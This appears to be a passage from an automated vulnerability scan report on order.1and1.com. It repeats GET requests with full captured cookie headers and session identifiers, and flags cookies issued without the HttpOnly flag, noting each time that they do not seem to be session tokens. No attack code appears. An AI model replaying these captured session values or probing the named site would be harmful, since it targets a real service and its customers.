GET /xml/order/FeatureFtpBackup HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4eea5ce422d8c800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureGuaranteeMoneyback HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=11ac57a25b290000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrCitysearch HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1bca04215a9d2000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrGoogleAdWords HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrSesub;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1ae0db54ed0ae000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrSesub HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=471b83efa6aad000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrStat HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=628afd437aeefc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureParallelsPlesk HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=138db911f48c1c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureParallelsSB HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSecurityCertificate;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4ca34797f0aac000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSecurityCertificate HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=159733db96707000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerDedOsLinux HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7f477cb0efbac400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerDedOsLinuxOpt HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=610a8252a61f9c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerDedOsWindows HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=87e626148423c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
